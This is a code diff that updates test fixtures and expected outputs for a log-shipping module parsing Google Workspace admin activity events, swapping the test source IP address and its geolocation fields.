+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_DEVICE_STATE","parameters":[{"name":"DEVICE_NEW_STATE","value":"new"},{"name":"DEVICE_PREVIOUS_STATE","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"SEND_CHROME_OS_DEVICE_COMMAND","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_ANNOTATION","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_STATE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_USER_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"ISSUE_DEVICE_COMMAND","parameters":[{"name":"DEVICE_COMMAND_DETAILS","multiValue":["command","-a"]},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"MOVE_DEVICE_TO_ORG_UNIT_DETAILED","parameters":[{"name":"DEVICE_NEW_ORG_UNIT","value":"new"},{"name":"DEVICE_PREVIOUS_ORG_UNIT","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"REMOVE_CHROME_OS_APPLICATION_SETTINGS","parameters":[{"name":"APP_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_DEVICE","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json index 4e3b1eac91d3..de8f9323bd7c 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json 
@@ -9,7 +9,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -32,23 +32,19 @@ "log.offset": 0, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -69,7 +65,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -84,26 +80,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 648, + "log.offset": 647, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -125,7 +117,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -145,26 +137,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 1162, + "log.offset": 1160, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -185,7 +173,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -198,26 +186,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1802, + "log.offset": 1799, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -238,7 +222,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -250,26 +234,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2233, + "log.offset": 2229, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -291,7 +271,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -306,26 +286,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2634, + "log.offset": 2629, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -346,7 +322,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -361,26 +337,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3136, + "log.offset": 3130, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
